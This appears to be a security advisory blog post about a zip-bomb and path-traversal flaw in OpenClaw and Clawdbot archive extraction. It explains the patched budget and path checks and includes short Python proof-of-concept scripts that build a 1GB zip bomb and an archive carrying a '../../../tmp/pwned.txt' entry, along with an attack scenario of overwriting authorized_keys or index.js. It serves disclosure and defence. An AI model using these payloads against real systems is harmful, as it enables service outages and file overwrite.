Feb 18, 2026 · 7 min read
OpenClaw versions <= 2026.2.13 allow unauthenticated users (in some configurations) or low-privileged users to upload malicious archives. These archives can either be 'Zip Bombs' that crash the server by exhausting disk/memory, or contain path traversal payloads (`../../`) to overwrite sensitive system files. The fix enforces strict resource budgets and path sanitization.
A classic case of 'trusting the input' leads to Denial of Service and potential file overwrite in the OpenClaw and Clawdbot ecosystem. By failing to validate archive contents before extraction, the application becomes susceptible to 'Zip Bombs'—tiny files that expand into petabytes of garbage—and directory traversal attacks that can escape the sandbox.
There is a certain romance to the ZIP file. It’s the digital equivalent of a moving box—you pack things in, tape it up, and ship it off. But in the world of software development, opening that box is an act of extreme trust. You are effectively telling your computer, 'Take whatever is inside here and manifest it onto my hard drive.'
In the case of OpenClaw and its robotic cousin Clawdbot, this trust was misplaced. These tools are designed for automation, often handling user-supplied data or fetching packages from remote sources. To do their job, they need to extract archives. It sounds simple enough: read stream, decompress stream, write file.
However, the developers forgot one crucial rule of survival in the hostile internet: Compression is a lie. A 42-kilobyte file can mathematically represent petabytes of zeros. If your code blindly follows the instructions inside a ZIP header, it will try to allocate that memory or write those bytes until the host system screams and dies. This vulnerability, GHSA-h89v-j3x9-8wqj, is a textbook example of what happens when you let an unchecked algorithm run wild with system resources.
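To make the asymmetry concrete, here is a quick standalone sketch (using Node's built-in zlib, not OpenClaw's code) showing just how cheaply repetitive data compresses:

```typescript
import { deflateSync } from "node:zlib";

// One mebibyte of zeros...
const plain = Buffer.alloc(1024 * 1024);

// ...deflates down to roughly a kilobyte
const packed = deflateSync(plain);
console.log(`${plain.length} bytes -> ${packed.length} bytes`);
```

At ratios like this, a 42-kilobyte archive can legitimately declare gigabytes of output, and a decompressor that performs no accounting will dutifully produce all of it.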
This vulnerability is actually a 'buy one, get one free' deal. It combines two classic weakness classes: CWE-409 (Improper Handling of Highly Compressed Data) and CWE-22 (Path Traversal).
The first issue is the lack of resource accounting. The extract logic in src/infra/archive.ts operated on a loop: get entry, write entry. It didn't care if the entry was 1MB or 100GB. It didn't care if the archive claimed to contain 10 million files. In the world of Node.js, where streams are often piped directly to the filesystem, this is catastrophic. An attacker can construct a recursive archive (like the infamous 42.zip) or a 'flat' bomb (a single massive text file of repeated characters). The application will dutifully try to process it, consuming all available inodes, disk space, or RAM, leading to a hard crash.
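The missing accounting can be sketched in a few lines. The names below are hypothetical illustrations, not OpenClaw's actual API:

```typescript
// Hypothetical guard: refuse archives that declare absurd entry counts
const MAX_ENTRIES = 50_000;
let entryCount = 0;

function onEntry(entryPath: string): void {
  if (++entryCount > MAX_ENTRIES) {
    throw new Error(`Archive exceeds ${MAX_ENTRIES} entries: ${entryPath}`);
  }
  // ...otherwise hand the entry to the (byte-budgeted) extractor...
}
```

Even this trivial counter defeats the "ten million empty files" variant of the attack before a single inode is wasted.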
The second issue is arguably more dangerous for integrity. The extractor blindly trusted the filenames within the archive. If a file inside the ZIP was named ../../../../etc/passwd, the extractor would resolve that path relative to the extraction root. Since there was no check to ensure the resolved path remained inside the target directory, the application would overwrite files outside its sandbox. This turns a simple file upload into an arbitrary file overwrite primitive.
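You can see the escape with nothing but Node's `path` module (a standalone illustration, not the project's code):

```typescript
import * as path from "node:path";

const extractRoot = "/srv/openclaw/extract";
const entryName = "../../../../etc/passwd";

// resolve() happily walks out of the extraction root
const target = path.resolve(extractRoot, entryName);
console.log(target); // "/etc/passwd" on POSIX

// The containment check the extractor should have made
const contained = target.startsWith(extractRoot + path.sep);
console.log(contained); // false -> this entry must be rejected
```

The fix is exactly that last line: resolve the full destination path first, then refuse any entry whose resolved path is not strictly inside the extraction root.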
The remediation for this vulnerability is a masterclass in defensive coding. The maintainers didn't just patch a regex; they architected a budget system. Let's look at the fix in commit d3ee5deb87ee2ad0ab83c92c365611165423cb71.
Previously, the code likely looked something like this (pseudocode):

```typescript
// The "YOLO" approach: whatever the archive says, write it
stream.pipe(unzip.Parse()).on('entry', (entry) => {
  // No size check, no entry count, no path validation
  entry.pipe(fs.createWriteStream(path.join(destDir, entry.path)));
});
```

The fix introduces an `ArchiveExtractLimits` interface and a `createExtractBudgetTransform` stream. This acts as a toll booth for bytes: every byte extracted must be accounted for.
```typescript
// src/infra/archive.ts (post-fix)
const limits = {
  maxArchiveBytes: 256 * 1024 * 1024,   // 256MB compressed
  maxExtractedBytes: 512 * 1024 * 1024, // 512MB unpacked
  maxEntries: 50000,
};

// Check the compressed size first
if (stats.size > limits.maxArchiveBytes) {
  throw new Error(`Archive size ${stats.size} exceeds limit`);
}

// The budget transform
let extractedBytes = 0;
const budgetStream = new Transform({
  transform(chunk, encoding, callback) {
    extractedBytes += chunk.length;
    if (extractedBytes > limits.maxExtractedBytes) {
      return callback(new Error('Extraction budget exceeded'));
    }
    this.push(chunk);
    callback();
  }
});
```

They also implemented strict path validation for node-tar hooks:
```typescript
// Preventing traversal: reject relative escapes and absolute paths
if (entry.path.includes('..') || path.isAbsolute(entry.path)) {
  // Deny entry
}
```

This code creates a 'budget' for the extraction process. If the archive tries to withdraw more bytes than allowed, the transaction is cancelled and the stream is destroyed.
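Putting the pieces together, a hardened per-entry pipeline might look like this sketch. The helper and variable names are illustrative re-implementations of the budget idea, not the exact code from src/infra/archive.ts:

```typescript
import { Transform } from "node:stream";

// Illustrative budget transform: fail the pipeline once total
// throughput exceeds the allowance, regardless of ZIP headers
function createExtractBudgetTransform(maxExtractedBytes: number): Transform {
  let extracted = 0;
  return new Transform({
    transform(chunk: Buffer, _encoding, callback) {
      extracted += chunk.length;
      if (extracted > maxExtractedBytes) {
        return callback(new Error("Extraction budget exceeded"));
      }
      callback(null, chunk);
    },
  });
}

// Per entry: entry stream -> budget -> disk. If the budget trips,
// pipeline() destroys every stage and surfaces the error:
//   await pipeline(entry,
//                  createExtractBudgetTransform(limits.maxExtractedBytes),
//                  fs.createWriteStream(destPath));
```

Because the check runs per chunk, the process never materializes more than one chunk beyond the budget, no matter how large the archive claims its contents are.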
Exploiting this is trivial and requires no advanced reverse engineering, just a basic understanding of how compression works. Here is how a researcher (or attacker) would demonstrate the impact.
We don't need a complex fuzzer. We can use Python to generate a 'flat' zip bomb that is tiny on disk but huge once extracted.
```python
# generate_bomb.py
import zipfile

z = zipfile.ZipFile('bomb.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
# Create a file with 1GB of zeros
data = '0' * (1024 * 1024 * 1024)
z.writestr('big_file.txt', data)
z.close()
```

This script creates a ZIP file that is only a few kilobytes (because a billion zeros compress very well) but expands to 1GB. For a full DoS, repeat the `writestr` call with ten different entry names to demand 10GB of disk space.
To test the traversal, we simply give an entry a malicious name. Rather than fighting CLI tools that may sanitize paths, we can craft the entry name directly in Python:

```python
# generate_traversal.py
import zipfile

z = zipfile.ZipFile('malicious.zip', mode='w')
# The entry name itself carries the traversal payload
z.writestr('../../../tmp/pwned.txt', 'pwned')
z.close()
```

The attacker locates an upload endpoint in OpenClaw or Clawdbot that accepts archives (e.g., a plugin upload, a backup restore, or a dataset import). Upon uploading bomb.zip, the server hangs as it attempts to write 10GB of data. If the server is running in a container with limited storage, the ENOSPC ('No space left on device') error will crash the application and potentially other services on the same node.
While Denial of Service (DoS) is often dismissed as 'just downtime,' in the context of automation tools like OpenClaw, it can be devastating. OpenClaw is designed to run workflows. If the controller is taken offline by a disk-fill attack, all downstream automations fail. This could mean backups aren't taken, orders aren't processed, or monitoring alerts aren't fired.
Furthermore, the Path Traversal aspect elevates the risk significantly. If OpenClaw runs as root (which, let's be honest, many Docker containers still do by default), an attacker could overwrite /usr/bin/node or inject a malicious entry into .ssh/authorized_keys. Even running as a low-privileged user, an attacker could overwrite the application's own source code (e.g., index.js) to achieve persistent Remote Code Execution (RCE) the next time the application restarts.
This isn't just a crash; it's a potential foothold.
The only reliable fix is to update the affected packages. The vulnerability is patched in OpenClaw v2026.2.14. The fix is structural, not just a configuration change, so code updates are mandatory.
Run `npm update openclaw clawdbot` immediately. If you are writing code that handles archives, never assume the header tells the truth. Always implement entry-count limits, a total extracted-byte budget, and path containment checks before a single byte hits the disk.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| OpenClaw | <= 2026.2.13 | 2026.2.14 |
| Clawdbot | <= 2026.1.24-3 | Latest |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-409 (Zip Bomb) / CWE-22 (Path Traversal) |
| CVSS Score | 7.5 (High) |
| Attack Vector | Network (via File Upload) |
| Impact | Denial of Service & File Overwrite |
| Exploit Status | No public PoC, but trivial to exploit |
| Patch Date | 2026-02-14 |